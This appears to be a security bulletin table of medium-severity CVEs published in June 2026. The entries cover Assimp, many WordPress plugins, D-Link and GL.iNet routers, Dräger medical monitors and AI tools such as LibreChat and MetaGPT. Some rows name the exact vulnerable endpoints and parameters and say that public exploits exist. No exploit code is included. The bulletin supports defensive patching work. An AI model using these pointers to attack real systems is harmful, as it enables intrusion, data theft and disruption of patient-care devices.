| Assimp--Assimp | A vulnerability was determined in Assimp up to 6.0.4. This affects the function HL1MDLLoader::read_meshes of the file HL1MDLLoader.cpp of the component Half-Life 1 MDL Loader. This manipulation causes heap-based buffer overflow. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. The project tagged the reported issue as bug. | 2026-06-01 | 5.3 | CVE-2026-10229 |
| Assimp--Assimp | A vulnerability was identified in Assimp up to 6.0.4. This impacts the function Assimp::MDL::HalfLife::HL1MDLLoader::read_animations of the file HL1MDLLoader.cpp of the component Half-Life 1 MDL Loader. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. The project tagged the reported issue as bug. | 2026-06-01 | 5.3 | CVE-2026-10230 |
| Assimp--Assimp | A security flaw has been discovered in Assimp up to 6.0.4. Affected is the function HL1MDLLoader::extract_anim_value of the file HL1MDLLoader.cpp of the component Half-Life 1 MDL Loader. Performing a manipulation of the argument num.total results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. The project tagged the reported issue as bug. | 2026-06-01 | 5.3 | CVE-2026-10231 |
| Assimp--Assimp | A weakness has been identified in Assimp up to 6.0.4. Affected by this vulnerability is the function aiNode::~aiNode of the file scene.cpp of the component ASE File Parser. Executing a manipulation can lead to use after free. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. The project tagged the reported issue as bug. | 2026-06-01 | 5.3 | CVE-2026-10232 |
| AstrBotDevs--AstrBot | A vulnerability was found in AstrBotDevs AstrBot 4.23.6. Affected by this vulnerability is the function _sanitize_prompt_description of the file astrbot/core/skills/skill_manager.py. The manipulation results in injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10210 |
| AstrBotDevs--AstrBot | A vulnerability was determined in AstrBotDevs AstrBot 4.23.6. Affected by this issue is the function _normalize_rw_path of the file astrbot/core/tools/computer_tools/fs.py. This manipulation causes incorrect authorization. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10211 |
| AstrBotDevs--AstrBot | A vulnerability was identified in AstrBotDevs AstrBot 4.24.2. This affects the function astr_main_agent of the file astrbot/core/astr_main_agent.py. Such manipulation of the argument session_id leads to authorization bypass. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10212 |
| AstrBotDevs--AstrBot | A security flaw has been discovered in AstrBotDevs AstrBot 4.23.6. This vulnerability affects unknown code of the file /api/skills/delete of the component API Endpoint. Performing a manipulation of the argument Name results in path traversal. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 5.4 | CVE-2026-10213 |
| awordpresslife--Event Monster Event Manager, Ticket Booking & Registration | The Event Monster - Event Management, Events Calendar, Tickets plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 2.1.0. This is due to the capture_payment() AJAX handler (registered via wp_ajax_nopriv_em_capture_payment) trusting client-supplied payment data - including transaction ID, amount, and payment status - without performing any server-side verification against the PayPal API or any other payment gateway, and without nonce or capability checks. This makes it possible for unauthenticated attackers to forge payment records, mark bookings as Completed, and obtain confirmation emails containing valid QR code tickets without making any actual payment. | 2026-06-05 | 5.3 | CVE-2026-8608 |
| AWS--Graph Explorer | Proxy server in Graph Explorer before 3.0.1 falls back to HTTP when certificate files are missing, which might allow remote threat actors to obtain sensitive information via interception of requests intended to be sent over HTTPS. To remediate this issue, users should upgrade to Graph Explorer v3.0.1 or later. | 2026-06-02 | 5.9 | CVE-2026-10584 |
| birdseedapp--BirdSeed | The BirdSeed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing nonce validation in the birdseed_plugin_settings_page() function. The function processes the 'birdseed_token' GET parameter and saves it to the database via update_option() without verifying a nonce. This makes it possible for unauthenticated attackers to change the plugin's BirdSeed token setting via a forged request, granted they can trick a site administrator into performing an action such as clicking a link. | 2026-06-02 | 4.3 | CVE-2026-4071 |
| Bottelet--DaybydayCRM | A vulnerability was detected in Bottelet DaybydayCRM up to 2.2.1. Affected is an unknown function of the component Setting Handler. Performing a manipulation results in missing authentication. Remote exploitation of the attack is possible. It is recommended to apply a patch to fix this issue. | 2026-06-01 | 6.3 | CVE-2026-10283 |
| Bottelet--DaybydayCRM | A security vulnerability has been detected in Bottelet DaybydayCRM up to 2.2.1. This impacts the function view of the file app/Http/Controllers/DocumentsController.php. Such manipulation leads to improper authorization. The attack may be launched remotely. It is best practice to apply a patch to resolve this issue. | 2026-06-01 | 4.3 | CVE-2026-10282 |
| browserstack--browserstack-runner | BrowserStack Runner through 0.9.5 contains a path traversal vulnerability in the _default HTTP handler in lib/server.js that allows unauthenticated network-adjacent attackers to read arbitrary files. Attackers can exploit the unauthenticated HTTP server bound on all interfaces to traverse outside the project root and access sensitive files. | 2026-06-02 | 6.5 | CVE-2026-49144 |
| chrisvrichardson--MapPress Maps for WordPress | The MapPress Maps for WordPress plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to, and including, 2.96.6. This is due to missing ownership verification in the REST API routes registered via `Mappress_Api::rest_api_init()`, where the GET `/wp-json/mapp/v1/maps/{mapid}` endpoint uses `'permission_callback' => '__return_true'` and the write endpoints (POST update, DELETE, PATCH mutate, POST clone, POST empty_trash) only check the generic `edit_posts` capability without confirming that the requester owns the targeted map - a gap that is not compensated at the model layer, as `Mappress_Map::get()`, `save()`, `delete()`, `mutate()`, and `empty_trash()` all operate on any caller-supplied map ID without an ownership check. This makes it possible for unauthenticated attackers to read sensitive map data - including POI titles, addresses, coordinates, and body content - for any map on the site by enumerating map IDs, and for authenticated attackers with Contributor-level access and above to modify, delete, trash/restore, or clone any map regardless of its author. | 2026-06-06 | 5.3 | CVE-2026-8839 |
| cifi--SEO Plugin by Squirrly SEO | The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 12.4.16. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to invoke privileged state-changing Squirrly cloud API operations, such as revoking the site's Google Search Console and Google Analytics integrations via `api/gsc/revoke` and `api/ga/revoke`, that are otherwise restricted to administrator-level users holding the `sq_manage_settings` capability. | 2026-06-06 | 4.3 | CVE-2026-7624 |
| Cisco--Cisco Finesse | A vulnerability in Cisco Finesse could allow an unauthenticated, remote attacker to load arbitrary files from remote locations into an active user session on an affected device, possibly leading to browser-based attacks. This vulnerability is due to insufficient validation of user-supplied input for HTTP requests that are sent to an affected device. An attacker who has knowledge of the address of the affected device could exploit this vulnerability by persuading a user to click a crafted link that contains the affected device address. A successful exploit could allow the attacker to conduct browser-based attacks and execute arbitrary script code in the context of the affected interface or access sensitive information on the affected device. | 2026-06-03 | 6.1 | CVE-2026-20175 |
| Cisco--Cisco Webex Meetings | A vulnerability in the web-based user interface of Cisco Webex Meetings could have allowed an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack. Cisco has addressed this vulnerability in the Webex Meetings service, and no customer action is needed. This vulnerability existed because of insufficient validation of user input. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by persuading a user to follow a malicious link. A successful exploit could have allowed the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information. | 2026-06-03 | 6.1 | CVE-2026-20233 |
| Cloud Foundry Foundation--windows-utilities-release | Weak Randomness / Insecure Cryptographic Primitive (CWE-338) in Get-RandomPassword in BOSH-Ecosystem / windows-utilities-release allows a network attacker to estimate VM boot time and reconstruct a small candidate list to recover the Administrator password. The randomize_password job exists solely to lock the local Administrator account behind an unguessable password as a hardening control. Because the password is derived from a predictable, clock-seeded PRNG, a network attacker who can estimate VM boot time can reconstruct a small candidate list and recover the Administrator password, defeating the hardening control. Affected versions: - windows-utilities-release: all versions prior to v0.23.0 (inclusive); fixed in v0.23.0 or later | 2026-06-04 | 6.5 | CVE-2026-41858 |
| CloudburstMC--Protocol | CloudburstMC Protocol is a protocol library for Minecraft Bedrock Edition. Prior to version 3.0.0.Beta12-20260420.182526-15, CloudburstMC Protocol is partially missing validation for FULL type authentication tokens (Cloudburst/Protocol). This vulnerability impacts publicly accessible software depending on the affected versions of Protocol, specifically the EncryptionUtils methods to validate auth payloads for FULL type tokens. This issue has been patched in version 3.0.0.Beta12-20260420.182526-15. | 2026-06-02 | 5.3 | CVE-2026-45289 |
| code-projects--Hotel and Tourism Reservation System | A security flaw has been discovered in code-projects Hotel and Tourism Reservation System 1.0. Impacted is an unknown function of the file /ht/tour.php. Performing a manipulation of the argument name /email /people /number results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-01 | 4.3 | CVE-2026-10289 |
| code-projects--Online Hospital Management System | A vulnerability has been found in code-projects Online Hospital Management System 1.0. Affected is an unknown function of the file appointmentdetail.php of the component Appointment Handler. The manipulation of the argument editid leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 6.3 | CVE-2026-10209 |
| CodeAstro--Ingredients Stock Management System | A flaw has been found in CodeAstro Ingredients Stock Management System 1.0. This vulnerability affects unknown code of the file /Ingredients-Stock/stock_manager.php. This manipulation of the argument txt_search_category causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2026-06-01 | 6.3 | CVE-2026-10235 |
| CodeAstro--Payroll System | A vulnerability was found in CodeAstro Payroll System 1.0. This affects an unknown part of the file /home_employee.php. The manipulation of the argument emp_id results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-06-01 | 6.3 | CVE-2026-10286 |
| crafium--OptinCraft Drag & Drop Optins & Popup Builder for WordPress | The OptinCraft - Drag & Drop Optins & Popup Builder for WordPress plugin for WordPress is vulnerable to generic SQL Injection via the 'order_by' parameter in all versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-06-06 | 4.9 | CVE-2026-8978 |
| D-Link--DWR-M920 | A vulnerability was detected in D-Link DWR-M920 1.1.50/1.1.70. Affected is the function sub_41C8E8 of the file /boafrm/formSmsManage. Performing a manipulation of the argument action_value results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-06-05 | 6.3 | CVE-2026-10878 |
| D-Link--DWR-M920 | A vulnerability was detected in D-Link DWR-M920 up to 1.1.50. The affected element is the function sub_41CF20 of the file /boafrm/formUSSDSetup. The manipulation of the argument ussdValue results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used. | 2026-06-05 | 6.3 | CVE-2026-11339 |
| D-Link--DWR-M920 | A flaw has been found in D-Link DWR-M920 up to 1.1.50. The impacted element is the function sub_412DA0 of the file /boafrm/formIMEISetup. This manipulation of the argument IMEI_value causes os command injection. The attack can be initiated remotely. The exploit has been published and may be used. | 2026-06-05 | 6.3 | CVE-2026-11341 |
| danny-avila--LibreChat | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, users with only `VIEW` access to an MCP server can retrieve the server's decrypted admin-managed secrets through `GET /api/mcp/servers` and `GET /api/mcp/servers/:serverName`. The returned config includes plaintext values for `apiKey.key` and `oauth.client_secret`. This allows viewers of a shared MCP server to exfiltrate the underlying provider credentials. Version 0.8..4 contains a patch. Other remediations include: never returning decrypted admin-managed secrets to non-owners; redacting apiKey.key and oauth.client_secret from all API responses consider returning only boolean presence indicators for secrets, similar to the auth-values route pattern; and, if owners need to edit configs without re-entering secrets, preserving secrets server-side and returning placeholders instead of plaintext. | 2026-06-02 | 6.5 | CVE-2026-44653 |
| davidfcarr--Quick Playground | The Quick Playground plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.4. This is due to the `qckply_data()` function passing the user-supplied `filename` POST parameter directly to `file_get_contents()` without any validation, sanitization, or path restriction. This makes it possible for authenticated attackers, with Administrator-level access and above, to read arbitrary files on the server, such as `wp-config.php` or `/etc/passwd`, which can contain sensitive information. Note: This vulnerability is only exploitable when the site has been synced with WordPress Playground (the `is_qckply_clone` option is set) or when running on `playground.wordpress.net`. | 2026-06-06 | 4.4 | CVE-2026-2500 |
| ddd2500--Google Plus One Bottom | The Google Plus One Bottom plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.0.2. This is due to missing or incorrect nonce validation on the googlePlusOneAdmin function. This makes it possible for unauthenticated attackers to modify the plugin's settings, including the plusone-lang, plusone-callback, and plusone-url options stored in the database via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9723 |
| decolua--9router | A security vulnerability has been detected in decolua 9router up to 0.4.0. This issue affects the function isAuthenticated of the file src/dashboardGuard.js of the component HTTP Header Handler. The manipulation of the argument Host leads to improper authorization. The attack is possible to be carried out remotely. Upgrading to version 0.4.1 is capable of addressing this issue. The identifier of the patch is 428e2c045cb9c0eb8080e8b580471a9c2eaa95ca. Upgrading the affected component is recommended. | 2026-06-01 | 6.3 | CVE-2026-10269 |
| decompress--decompress | All versions of the package decompress are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) when extracting a ZIP archive containing two entries with the same path - the first being a symlink to an arbitrary target and the second being a regular file - the file content is written through the symlink to the target location outside the output directory. This is due to the microtask processing order that checks readlink for the second file before resolving symlink for the first file. An attacker can write arbitrary file on the host filesystem potentially leading to remote code execution by providing a specially crafted ZIP archive. **Note:** This bypasses all existing path traversal protections including preventWritingThroughSymlink, added as a part of the fix for [CVE-2020-12265](https://security.snyk.io/vuln/SNYK-JS-DECOMPRESS-557358). | 2026-06-05 | 6.4 | CVE-2026-10732 |
| DedeCMS--DedeCMS | A flaw has been found in DedeCMS 5.7.88. Affected by this vulnerability is the function base64_decode of the file /plus/download.php?open=1. This manipulation of the argument Link causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-06-02 | 6.3 | CVE-2026-10581 |
| DeepAI--api.deepai.org | The DeepAI endpoint 'https://api.deepai.org/change_user_email' accepts POST requests without any CSRF protection. If an attacker can trick a logged-in user into clicking a malicious link, the attacker can change the user's email address and take over their account. Fixed on 2026-05-20. | 2026-06-01 | 5 | CVE-2026-49433 |
| Dell--ThinOS 10 | Dell ThinOS 10, versions prior to ThinOS10 2602_10.0765, contain an Improper Access control vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Information exposure. | 2026-06-02 | 6.1 | CVE-2026-40713 |
| den-media--hiWeb Migration Simple | The hiWeb Migration Simple plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'new_domain' parameter in all versions up to, and including, 2.0.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-06-02 | 6.1 | CVE-2026-2425 |
| DevaslanPHP--project-management | A flaw has been found in DevaslanPHP project-management up to 2.0.0-beta1. Affected by this vulnerability is the function editComment/doDeleteComment of the file app/Filament/Resources/TicketResource/Pages/ViewTicket.php of the component Livewire Handler. Executing a manipulation can lead to improper authorization. The attack can be executed remotely. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 5.4 | CVE-2026-10284 |
| DevaslanPHP--project-management | A vulnerability has been found in DevaslanPHP project-management up to 2.0.0-beta1. Affected by this issue is the function KanbanScrumHelper::recordUpdated of the file app/Helpers/KanbanScrumHelper.php of the component Ticket Handler. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 5.4 | CVE-2026-10285 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 do not properly validate uploaded files. The application can therefore be misused to host phishing pages, amongst other things. This also creates another instance of a Cross-Site Scripting (XSS) vulnerability. Version 2.4.28 contains a patch. | 2026-06-04 | 6.3 | CVE-2026-42538 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 return sensitive data to the user which are not required for the client's operation. Version 2.4.28 contains a patch. | 2026-06-04 | 6.5 | CVE-2026-42539 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. In versions prior to 2.4.28, users can create alerts for customers that are not assigned to them. This can be abused to falsely attribute fake alerts to customers. In combination with Cross-Site Scripting, this can also be used to exfiltrate alerts from other customers. Version 2.4.28 contains a patch. | 2026-06-04 | 5.4 | CVE-2026-42547 |
| dfir-iris--iris-web | Iris is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 contain a weakness where an attacker can misuse it to redirect the user to a malicious website controlled by an attacker. Version 2.4.28 fixes the issue. | 2026-06-04 | 4.7 | CVE-2026-42329 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 allow a user to alter values in the database via manipulated API requests. Version 2.4.28 contains a patch. | 2026-06-04 | 4.3 | CVE-2026-42540 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 are vulnerable to a cross-site request forgery attack, because they use the HTTP method `GET` to change state on the server. Version 2.4.28 contains a patch. | 2026-06-04 | 4.3 | CVE-2026-42543 |
| Ditec a.s.--D.Launcher 2 | D.Launcher 2 component of Slovak eID client ecosystem contains Improper URL Handler Processing vulnerability. Application registers multiple custom URL handlers that could be exploited to initiate full NTLM autentication or SMB connection to attacker infrastructure and to conduct SSRF (Server Side Request Forgery) attacks. User interaction is required as potential victim needs to open a specially crafted URL. | 2026-06-02 | 6.5 | CVE-2026-8993 |
| djangoproject--daphne | daphne before 4.2.2 did not pass maxFramePayloadSize or maxMessagePayloadSize to Autobahn's WebSocketServerFactory. Because Autobahn defaults both values to 0 (unlimited), an unauthenticated remote attacker could send arbitrarily large WebSocket messages or frames, causing excessive memory consumption and a denial of service. | 2026-06-03 | 5.3 | CVE-2026-44545 |
| Dolibarr--ERP CRM | A security vulnerability has been detected in Dolibarr ERP CRM up to 23.0.1. Impacted is the function checkUserAccessToObject of the file htdocs/holiday/class/api_holidays.class.php of the component Leave Request REST API. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 23.0.2 is recommended to address this issue. The identifier of the patch is ee93b6f2f9dd0f6aeefe9d718ab3ab0a44326b73. Upgrading the affected component is advised. | 2026-06-01 | 4.3 | CVE-2026-10215 |
| Drger--Atlan A350 | Dräger Atlan A350 software versions 1.00 through 1.01 contains an improper input handling vulnerability that allows attackers to cause a denial of service by sending specifically crafted non-Medibus-compliant data through the Medibus interface. Attackers can transmit malformed data to overload the internal processor, gradually disrupting device operation over several hours and causing loss of data transmission, delayed display of real-time curves, and deviation between displayed airway pressure values and screen curves. | 2026-06-02 | 4 | CVE-2021-4479 |
| Drger--Infinity Delta | Dräger Infinity Delta, Delta XL, and Kappa patient monitors contain a denial-of-service vulnerability that allows remote attackers to cause the monitor to reboot by sending a malformed network packet. Attackers can repeatedly send malformed network packets to disrupt patient monitoring until the device falls back to default configuration and loses network connectivity. | 2026-06-01 | 6.5 | CVE-2019-25716 |
| Drger--Infinity Delta | Dräger Infinity Delta, Delta XL, and Kappa patient monitors contain an information disclosure vulnerability that allows unauthenticated network attackers to access log files over a network connection. Attackers can retrieve device internals, location information, and wired network configuration details from the exposed log files. | 2026-06-02 | 4.3 | CVE-2019-25717 |
| Drger--Infinity M300 | Dräger Infinity M300 patient worn monitors with software version VG2.3.1 and earlier contain a network-based denial of service vulnerability that allows network-adjacent attackers to repeatedly trigger device reboots by sending malicious requests over the Infinity Network. Attackers can exploit this vulnerability to force the device into a fail state requiring manual restart, causing loss of wireless connectivity and interruption of patient monitoring functionality. | 2026-06-02 | 6.5 | CVE-2019-25721 |
| Drger--Infinity M300 | Dräger Infinity M300 patient worn monitors with software version VG2.x and earlier contain a network-based denial of service vulnerability that allows attackers with access to the hospital or Infinity Network to repeatedly trigger device reboots until the device enters a fail state requiring manual restart. Attackers can exploit this vulnerability to cause loss of wireless network connectivity, temporary loss of patient monitoring, and interruption of alarm functionality until the device is manually recovered. | 2026-06-02 | 6.5 | CVE-2019-25724 |
| Drger--Perseus A500 | Dräger Perseus A500 software versions 2.00 through 2.02 contains an improper input handling vulnerability that allows external attackers to cause a denial of service by sending specifically crafted non-Medibus-compliant data through the Medibus interface. Attackers can overload the internal processor with malformed data to trigger a warm restart, causing ventilation pressure to drop to ambient level and interrupting ventilation for several seconds before therapy resumes. | 2026-06-02 | 4 | CVE-2019-25723 |
| Drger--SC 6002XL | Dräger SC Monitoring devices (SC 6002XL, SC 6802XL, SC 7000, SC 8000, SC 9000 XL) contain a denial-of-service vulnerability in all software versions that allows unauthenticated attackers to reboot the monitor by sending a malformed network packet. Attackers can repeatedly send such malformed packets to disrupt patient monitoring until the device falls back to default configuration and loses network connectivity. | 2026-06-03 | 6.5 | CVE-2019-25720 |
| Drger--Zeus IE | Dräger Zeus Infinity Empowered (Zeus IE) and Zeus RS C500 anesthesia workstations contain a local security vulnerability that allows unauthorized individuals with physical access to compromise software integrity via USB interface manipulation. Attackers can exploit the unprotected USB interfaces to impair therapy functions, manipulate device-processed data, or leverage the device as a pivot point for broader network-based attacks when connected to a network or Dräger Service Connect. | 2026-06-02 | 6.8 | CVE-2025-15653 |
| EIPStackGroup--OpENer | A security vulnerability has been detected in EIPStackGroup OpENer up to 2.3.0. Affected is the function CreateMessageRouterRequestStructure of the file cipmessagerouter.c of the component SendRRData Handler. The manipulation leads to use after free. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-03 | 6.3 | CVE-2026-10703 |
| elabftw--elabftw | eLabFTW is an open source electronic lab notebook. Prior to version 5.4.2, in certain cases, an authenticated user performing a numeric reference/search can return results that include resources the requesting user is not authorized to view. The exposed information is limited (only the title). Attempts to access the underlying protected resource content remain blocked by authorization checks. Version 5.4.2 fixes the issue. # Affected Scope Cross-scope visibility of titles. No confirmed bypass of content-level access controls # Preconditions An authenticated user account No special privileges required beyond standard access # Impact This may enable unauthorized disclosure of sensitive information if confidential data is included in resource titles. Examples could include project names, patient identifiers, or other regulated information embedded in titles. | 2026-06-01 | 4.3 | CVE-2026-28511 |
| Elementor--Elementor Website Builder | Missing Authorization vulnerability in Elementor Elementor Website Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Elementor Website Builder: from n/a through 4.1.0. | 2026-06-02 | 5.4 | CVE-2026-49782 |
| elunez--eladmin | A weakness has been identified in elunez eladmin up to 2.7. This vulnerability affects unknown code of the file App.java of the component Application Deployment Module. This manipulation of the argument uploadPath causes command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 6.3 | CVE-2026-10550 |
| Emilia Projects--Progress Planner | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Emilia Projects Progress Planner allows Stored XSS. This issue affects Progress Planner: from n/a through 1.9.0. | 2026-06-02 | 5.9 | CVE-2026-28116 |
| Enderfga--claw-orchestrator | A security vulnerability has been detected in Enderfga claw-orchestrator up to 3.7.0. The impacted element is the function validateRegex of the file claw-orchestrator/src/embedded-server.ts of the component Session Grep Endpoint. The manipulation of the argument body.pattern leads to inefficient regular expression complexity. The attack may be initiated remotely. Upgrading to version 3.7.1 is sufficient to resolve this issue. The identifier of the patch is 3f970a974c65a94555c25af9f2796f11315e4584. It is recommended to upgrade the affected component. | 2026-06-01 | 4.3 | CVE-2026-10291 |
| epoupon--lms | Lightweight Music Server (LMS) though 3.76.0 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary JavaScript by embedding malicious HTML in media file metadata tags such as GENRE, ARTIST, or ALBUM. Attackers can introduce a crafted media file into the victim's library, causing the payload to be saved during library scanning and executed automatically in the web interface due to tag content being rendered using Wt::TextFormat::UnsafeXHTML without sanitization in src/lms/ui/Utils.cpp. | 2026-06-01 | 5.4 | CVE-2026-48559 |
| Ericsson--Packet Core Controller | Ericsson Packet Core Controller (PCC) versions prior to 1.39 contain a vulnerability where an attacker sending a large volume of specially crafted messages may cause service degradation. | 2026-06-05 | 6.5 | CVE-2025-59174 |
| erzhongxmu--JeeWMS | A weakness has been identified in erzhongxmu JeeWMS up to 141740afb2ba14d441c82a833d0a418d07ca2d69. This issue affects some unknown processing of the file /base-boot/actuator of the component Boot Actuator Endpoint. Executing a manipulation can lead to information disclosure. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 5.3 | CVE-2026-11458 |
| expresstech--Quiz and Survey Master (QSM) Easy Quiz and Survey Maker | The Quiz and Survey Master (QSM) - Easy Quiz and Survey Maker plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'order' parameter in all versions up to, and including, 11.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. If the secret key is exposed, this can be exploited by lower-privileged users. | 2026-06-05 | 4.9 | CVE-2026-6448 |
| federicocarrara--rognone | The rognone plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mode' parameter in versions up to, and including, 0.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-06-02 | 6.1 | CVE-2026-1450 |
| federicocarrara--rognone | The rognone plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'a' parameter in versions up to, and including, 0.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-06-02 | 6.1 | CVE-2026-1451 |
| flippercode--WP Maps Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory & Filters | The WP Maps - Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory & Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'location_messages' parameter in all versions up to, and including, 4.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the attacker to hold the custom wpgmp_manage_location capability, which is granted to administrators by default but can be assigned to lower-privileged roles via the plugin's Permissions screen. | 2026-06-06 | 4.4 | CVE-2026-9594 |
| FoundationAgents--MetaGPT | A weakness has been identified in FoundationAgents MetaGPT up to 0.8.2. This affects the function Message.check_instruct_content of the file metagpt/schema.py. Executing a manipulation of the argument mapping can lead to deserialization. The attack is restricted to local execution. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 5.3 | CVE-2026-10566 |
| FoundationAgents--MetaGPT | A vulnerability was determined in FoundationAgents MetaGPT up to 0.8.2. Affected by this issue is the function check_cmd_exists of the file metagpt/utils/common.py. This manipulation of the argument mermaid.path causes command injection. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-07 | 5 | CVE-2026-11455 |
| frankpw--FPW Category Thumbnails | The FPW Category Thumbnails plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the 'fpw_fs_get_file' AJAX action in all versions up to, and including, 1.9.5. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the plugin's settings page. | 2026-06-02 | 6.4 | CVE-2026-2382 |
| Fruitfulcode--Zoner Real Estate | WordPress Theme Zoner Real Estate 4.1.1 contains a persistent cross-site scripting vulnerability that allows authenticated agents to inject malicious scripts through the Address input field when creating properties. Attackers can inject JavaScript payloads in the property creation form that execute when administrators view the property for approval, enabling cookie theft and session hijacking. | 2026-06-04 | 6.4 | CVE-2019-25742 |
| Gigtodoscript--GigToDo | GigToDo 1.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript and HTML code through the proposal description field. Attackers can craft XSS payloads in the create_proposal endpoint that execute when administrators or other users view the stored proposal, enabling cookie theft and malicious redirects. | 2026-06-04 | 6.4 | CVE-2019-25739 |
| Gitlawb--openclaude | OpenClaude is an open-source coding-agent command line interface for cloud and local model providers. Prior to version 0.5.1, the OpenClaude MCP authentication flow starts a temporary local HTTP server to handle OAuth callbacks. To prevent CSRF attacks, the server validates a state parameter against an internally stored value. However, due to a logic flaw in the order of conditionals, an attacker can completely bypass this check and force the server to shut down - without knowing the state value at all. This issue has been patched in version 0.5.1. | 2026-06-02 | 6.5 | CVE-2026-42073 |
| GL.iNet--GL-MT3000 | A security flaw has been discovered in GL.iNet GL-MT3000 up to 4.4.5. Impacted is the function iwinfo_backend of the file iwinfo.so of the component MTK Backend. The manipulation of the argument device results in command injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 4.7 is recommended to address this issue. Upgrading the affected component is recommended. The vendor confirms: "Starting from version 4.7, SDK has added global protection to intercept malicious injection". | 2026-06-07 | 6.3 | CVE-2026-11447 |
